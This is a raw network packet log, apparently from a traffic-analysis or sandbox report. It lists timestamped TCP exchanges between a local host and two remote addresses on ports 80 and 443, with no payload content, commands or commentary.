Dec 16, 2024 11:03:29.074316025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.074321032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.074362040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.076672077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.076719046 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.076791048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.076842070 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.079478025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.079536915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.079541922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.079581022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.082010031 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.082068920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.082072020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.082118034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.084434032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.084491014 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.084527969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.084577084 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.087110996 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.087168932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.087171078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.087219000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.089483976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.089523077 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.089538097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.089566946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.092005968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.092045069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.092056990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.092087984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.094485044 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.094538927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.094558954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.094600916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.097287893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.097346067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.097349882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.097397089 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.099570036 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.099623919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.099659920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.099714041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.102185965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.102235079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.102243900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.102281094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.104932070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.104970932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.104983091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.105015993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.107481003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.107539892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.107539892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.107584000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.109927893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.109992981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.110049963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.110096931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.112638950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.112696886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.112696886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.112741947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.114979029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.115042925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.115072012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.115123034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.117341042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.117393970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.117515087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.117566109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.119925976 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.119963884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.119978905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.120011091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.123075008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.123132944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.123142004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.123186111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.125226974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.125288010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.125322104 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.125372887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.127609015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.127662897 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.127691984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.127741098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.130192995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.130250931 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.130289078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.130341053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.132780075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.132838964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.132841110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.132884979 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.135452986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.135509014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.135515928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.135555029 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.137942076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.137999058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.138000011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.138051033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.140398026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.140469074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.240466118 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.240521908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.240544081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.240575075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.241307020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.241471052 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.241508961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.241569042 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.243020058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.243073940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.243168116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.243220091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.245006084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.245119095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.245224953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.245279074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.247375011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.247411966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.247435093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.247458935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.249340057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.249377012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.249397993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.249420881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.251333952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.251385927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.251391888 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.251441956 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.253273010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.253325939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.253379107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.253427982 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.255335093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.255440950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.255444050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.255495071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.257292032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.257347107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.257477045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.258863926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.259174109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.259231091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.259295940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.259346962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.261159897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.261195898 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.261215925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.261241913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.263118982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.263175964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.263201952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.263254881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.264877081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.264931917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.265022993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.265075922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.266693115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.266748905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.266815901 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.266866922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.268634081 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.268691063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.268697023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.268737078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.270487070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.270546913 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.270550013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.270606041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.272443056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.272479057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.272505999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.272524118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.274247885 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.274285078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.274307013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.274322987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.276081085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.276140928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.276238918 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.276292086 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.277895927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.277959108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.278028011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.278079987 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.279824018 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.279880047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.279957056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.280006886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.281646013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.281702995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.281786919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.281837940 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.283633947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.283670902 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.283725977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.283725977 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.285429955 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.285484076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.285556078 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.285607100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.286798954 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:29.287040949 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:29.287100077 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:29.287267923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.287329912 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.287348986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.287404060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.289134026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.289192915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.289228916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.289279938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.291064978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.291100979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.291146040 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.291165113 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.292787075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.292848110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.292916059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.292964935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.294744968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.294800997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.294868946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.294924974 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.296636105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.296673059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.296684027 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.296716928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.298433065 CET	49832	443	192.168.2.5	34.226.108.155
Dec 16, 2024 11:03:29.298472881 CET	443	49832	34.226.108.155	192.168.2.5
Dec 16, 2024 11:03:29.298516035 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.298552990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.298568964 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.298595905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.300249100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.300312996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.300359964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.300406933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.302227974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.302263021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.302283049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.302308083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.303982973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.304044962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.304151058 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.304203033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.305917978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.305974007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.306103945 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.306154013 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.307981968 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.308037043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.308080912 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.308142900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.309870005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.309906006 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.309942007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.309954882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.311575890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.311635017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.311657906 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.311709881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.313400984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.313457012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.313508034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.313559055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.315207005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.315260887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.315336943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.315399885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.317219019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.317255974 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.317280054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.317301989 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.319041014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.319077969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.319103956 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.319118023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.320802927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.320862055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.320916891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.320966959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.322674990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.322737932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.322892904 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.322947025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.324673891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.324709892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.324721098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.324755907 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.326406002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.326464891 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.326581001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.326634884 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.328401089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.328458071 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.328528881 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.328573942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.330322981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.330378056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.330382109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.330431938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.331970930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.332025051 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.332081079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.332134962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.333956003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.333992958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.334017992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.334033012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.335769892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.335805893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.335823059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.335850954 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.337558985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.337615967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.337616920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.337666988 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.432349920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.432413101 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.432524920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.432571888 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.433135986 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.433193922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.433255911 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.433307886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.434709072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.434765100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.434837103 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.434889078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.436286926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.436338902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.436466932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.436511993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.438163042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.438220024 CET	49833	80	192.168.2.5	31.41.244.11
